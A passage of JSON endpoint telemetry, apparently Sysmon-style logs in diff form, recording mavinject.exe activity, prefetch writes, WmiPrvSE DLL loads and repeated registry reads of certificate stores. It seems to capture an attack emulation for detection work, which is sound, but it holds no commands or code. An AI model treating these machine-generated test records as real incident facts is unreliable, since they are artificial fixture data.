"C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570890000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "process", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "subtype": "terminate", - "timestamp": 131883573571040000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "file", - "file_name": "MAVINJECT.EXE-B106A478.pf", - "file_path": "C:\\Windows\\Prefetch\\MAVINJECT.EXE-B106A478.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573571200016, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "file", - "file_name": "WMIAPSRV.EXE-576286C3.pf", - "file_path": "C:\\Windows\\Prefetch\\WMIAPSRV.EXE-576286C3.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573582140000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "file", - "file_name": "WMIPRVSE.EXE-43972D0F.pf", - "file_path": "C:\\Windows\\Prefetch\\WMIPRVSE.EXE-43972D0F.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573589960000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "registry", - "pid": 2712, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", - "registry_value": "VFUProvider", - "timestamp": 131883573600110000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" - }, - { - "event_type": "registry", - "pid": 2712, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider\\StartTime", - "registry_value": "StartTime", - "timestamp": 131883573600110000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573788080000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573788080000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573788080000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573788080000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573788080000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "image_load", - "image_name": "Wldap32.dll", - "image_path": "C:\\Windows\\System32\\Wldap32.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "FirewallAPI.dll", - "image_path": "C:\\Windows\\System32\\FirewallAPI.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "image_load", - "image_name": "ntdsapi.dll", - "image_path": "C:\\Windows\\System32\\ntdsapi.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "image_load", - "image_name": "FWPUCLNT.DLL", - "image_path": "C:\\Windows\\System32\\FWPUCLNT.DLL", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "image_load", - "image_name": "mi.dll", - "image_path": "C:\\Windows\\System32\\mi.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "image_load", - "image_name": "miutils.dll", - "image_path": "C:\\Windows\\System32\\miutils.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "image_load", - "image_name": "fwbase.dll", - "image_path": "C:\\Windows\\System32\\fwbase.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573788700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573788700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573788700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573788700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573788700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573788700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573788700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573788700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573788700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573788700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573788700016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wfascim.dll", - "image_path": "C:\\Windows\\System32\\wbem\\wfascim.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573788550000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wbemprox.dll", - "image_path": "C:\\Windows\\System32\\wbem\\wbemprox.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573789020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 